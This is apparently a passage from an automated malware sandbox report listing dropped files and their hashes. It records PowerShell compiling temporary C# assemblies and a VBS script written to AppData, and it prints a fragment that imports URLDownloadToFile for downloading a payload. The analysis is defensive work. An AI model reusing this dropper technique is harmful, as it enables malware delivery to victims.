Size (bytes):	3072
Entropy (8bit):	2.8759530313621333
Encrypted:	false
SSDEEP:	24:etGS+p2YYnl8cPkSy1063VttkZfDvCq4lWI+ycuZhNgkFakS5kqPNnq:61Y8+gy1LFoJDKqF1ulgkFa35kGq
MD5:	904EDDB3C1B071B72D127D96D4852DB5
SHA1:	162CEAA7A2047B6622B6E05C59C3E52AA7720E5D
SHA-256:	3FA930D1270F2387FA366FED78CF3E71759C6D398E4B0A84DE2E5A799223C2DA
SHA-512:	CD592A5672FF1F699CE39551B85E917CFF38A1359A5317C0BA4B350E19D8E91E292833A54807103083F30DFB7D46C1877A227ACEB86E11A304D3991881EEA7A7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5....................................... .............. C.....P ......U.........[.....c.....j.....v.....\|...U.....U...!.U.....U.......!......!.....C.......................................,..........<Module>.3w

C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
Category:	modified
Size (bytes):	866
Entropy (8bit):	5.351079054377748
Encrypted:	false
SSDEEP:	24:AId3ka6KznEoqKaMD5DqBVKVrdFAMBJTH:Akka60nEoqKdDcVKdBJj
MD5:	755B362351B9F58EC0F5412A3B32409B
SHA1:	B0F08401B59BFE62F6271F053CCB38D37EAF4CC8
SHA-256:	B1812FAB86662356C225E147A0144F1671D57F31A5B28599B7D4B308C02B5301
SHA-512:	CD8CAB413B177D9DFD71827F638DF8688E88BE5DF0405E0B7DB0C3B88B32CD8457BE0453530370D5837E0B60F56C3A1B82F5CBDBD0C86E9A561788BC001BA6B1
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.121803143532661
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryzOlWlIoak7YnqqIOlWlI9PN5Dlq5J:+RI+ycuZhNgkFakS5kqPNnqX
MD5:	E6655B069718CAA11CEF2F7DA404C421
SHA1:	7EA61196B0AA3701776D18FD538C39CF4DD3190F
SHA-256:	D7DA02FAFD3D4CF074E214A5B272DC31C4B898848B17A6F3977E2C9A0E0AC1A9
SHA-512:	7BD9C7063EB6091037E1D29230DB3554B84667B07FE476167B035CE74AB6C773AC8FCCA99A1276619581761D9B61AA18CF773A774164708495ACBD80F9C06FB3
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.w.1.s.x.m.q.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.w.1.s.x.m.q.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\5fjqud0c.jvz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\RES7AEA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:51:06 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.991286959097874
Encrypted:	false
SSDEEP:	24:HnOe9EurZiLZdHw8wKdNWI+ycuZhNEakSQPNnqSqd:7rZiLQDKd41ulEa3IqSK
MD5:	43850047E649A910C5C38E4324333916
SHA1:	4C78293FB51C74BD2A132FE29A1EE287A711C0BC
SHA-256:	65E2F18B4EB36D21F3E4D92893DEBCE1D110126F34751C3E6541898B9C0518C5
SHA-512:	BD66CA3E0B0D7E3AFC325444B28BF12DD3E1F4DDF2C3BC95CB60DC0F41E190B5CA59BBC023C19EC73959B765224E3F8610F967A885425B7203EB4D6B32DD957F
Malicious:	false
Preview:	L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP...................w.N_#P. Q[.U...........4.......C:\Users\user\AppData\Local\Temp\RES7AEA.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.w.n.d.u.r.z.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\RES9251.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:51:12 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	4.010035046591499
Encrypted:	false
SSDEEP:	24:HYe9E2U5igTXdHMwKdNWI+ycuZhNgkFakS5kqPNnqSqd:AnZzKd41ulgkFa35kGqSK
MD5:	9AB878C04F3E6466AFA4FAFADCBA313A
SHA1:	C308FF5CD3BB43BF9F638F76CCCADDD7D28072EE
SHA-256:	6634E0B70D0A0B4F576CB1F380F56806E54D30238707116EE5987CF991BCF2FF
SHA-512:	5F8322902A290B2C4BD746C5591DC7D286202D01760202CAEA25DF03793EE30C5D7DCF723AC4FB886D4744D6DD4962040320FA67019655115327370B2E50B5B6
Malicious:	false
Preview:	L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP................e[....../}...!..........4.......C:\Users\user\AppData\Local\Temp\RES9251.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.w.1.s.x.m.q.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\c4uo25w2.23k.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\cj5x5cuz.uy5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\cxperjly.vas.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.096720085443657
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryz+ak7YnqqufPN5Dlq5J:+RI+ycuZhNEakSQPNnqX
MD5:	1A8D07778E4E5F2350F420515B83551D
SHA1:	378D0F18B40FEE7DE866C70A2400CA361CE26416
SHA-256:	0DD4338F0AE1DC5C50F642EA7EA49DC0A110CBF20761ADE389A560CAC63A8E83
SHA-512:	424EC638133F0809FFBCC2E913B1847ADC6A510051618D2216D8AFFE6F1CE5149A3B3259E585EE69302DD70A07B8DB5C3DFBFB11CF5882A54C03E9F6C6D19C45
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.w.n.d.u.r.z.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.w.n.d.u.r.z.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
Category:	dropped
Size (bytes):	480
Entropy (8bit):	3.9787141625870177
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuH0qiwPMmHnQXReKJ8SRHy4HOCluVmmZOe/o2Iy:V/DTLDfuH05tXfH6ysXIy
MD5:	CE22E90871744B25A04AC8C5691F49CC
SHA1:	BC0A93C1FE61E00DAA34774994B638D19F735228
SHA-256:	3B955E3C74519870AACEF3876B7CDC4420F0B77D2D09937B7385E8B578F26546
SHA-512:	5F13AF44F2219D050D04658808B287BCB9C948765A1ACA148AB148E0981087AB22D6B5AF9FA74360B41A7322B9009858CF25E480A579B16FC8BD62C9B72D0F88
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace DZVrARMdWah.{. public class UbTbpiKe. {. [DllImport("UrlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr btGlUjs,string cDSFYG,string eDacYyTYYCQ,uint BkZoE,IntPtr AjQtbauHqbT);.. }..}.

C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.2392598612995
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f31x0zxs7+AEszIP23f31xz9:p37Lvkmb6Kzvn0WZEovnz9
MD5:	F4CC4D7599CDF5D35B4591435DDADFCF
SHA1:	78D6262ED7CDB2329969C4E643226BFD2FBB3C62
SHA-256:	BDD2903F97BA986EEBEB82FBA42D4F95220D18413CCA8E3BDC13AFDB8ECA4F48
SHA-512:	F24492C02AB832CD04016909E9602C59E4D3EDAC9FEE721EA407CFF2B5E4F74AF58C2A0149D96C4BF6F8D9B44B856F408AE064320C754F1D09752D156DB1F819
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.0.cs"

C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.8749873414041844
Encrypted:	false
SSDEEP:	24:etGStFEp2YYnl8cPkSy1J63VttkZfgR6rq4lWI+ycuZhNEakSQPNnq:6HY8+gy1cFoJgIrqF1ulEa3Iq
MD5:	B9B04381CC28A3D5304A871C8D0B5D77
SHA1:	556C02E553F582BC1ADFC66CAF25B4FEB2CFE1D0
SHA-256:	09E6E299C343471CCDA85E45DFA0A2CD9ABA73C920B26BE2BD35BAD6FE698A24
SHA-512:	9D9F1F74AEAEEEB4F363CAA2BAF7536F634B321188E412D58EADB8710B2A860B45D083D84F42795278F21B82DAC8F8B142D7CC6CAA7CDDEB9751B2AF9C16189F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5....................................... .............. C.....P ......U.........[.....c.....j.....v.....\|...U.....U...!.U.....U.......!......!.....C.......................................,..........<Module>.lw

C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
Category:	modified
Size (bytes):	866
Entropy (8bit):	5.329902570324342
Encrypted:	false
SSDEEP:	24:AId3ka6KzNEo8KaMD5DqBVKVrdFAMBJTH:Akka60NEo8KdDcVKdBJj
MD5:	3B932E29F418E97D480442FAE865BF5B
SHA1:	44C6660682F95590271EC26A077697E297DFD3CF
SHA-256:	3E7638C31185869B73F46DE222B4F2EC3B7822750C277E7A148527027E1A80ED
SHA-512:	4F86F7CB4A56DA3A27EB96837FAF11B5FBD03A9DD1FFA122924597E7A73A49388193CB2FB8F43A69C0CF7CC1C748BFA016106C42880E0ECCE964437D27D0760F
Malicious:	false
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\mg20lqoj.r4c.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\mogcvflq.4gp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\v3dqwrfp.hjg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\vigjsfpz.0ft.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\w2ilyone.qv5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\xqzu2zun.dfy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\~DF2695108681295A60.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF48F43F245FA812AF.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF5CF548D4DA5D9F14.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	139408
Entropy (8bit):	3.700015256114386
Encrypted:	false
SSDEEP:	3072:5S7Ngt5pSGw2yzrgYvQw7ZweRFdvTtLALWdkj:EgmQowexvxHdkj
MD5:	74339D80989D10693DBC1115D1CF3EB4
SHA1:	BD9B4DEA8D68DB3261E4EB23A9DFE857D0F9EE44
SHA-256:	A73C93345D81B888FE37255ABC545DCDB3470B4F0BD59654E4B398C87BE6B64D
SHA-512:	4BEFE3383549FB2048E9617430B284F8B62CCE46FA4998A62122E7ED4349357AD9B11C0A0819C40467CE3B2CA7648222B1714E3745A4E74F50FAE3D569CAA1BA
Malicious:	true
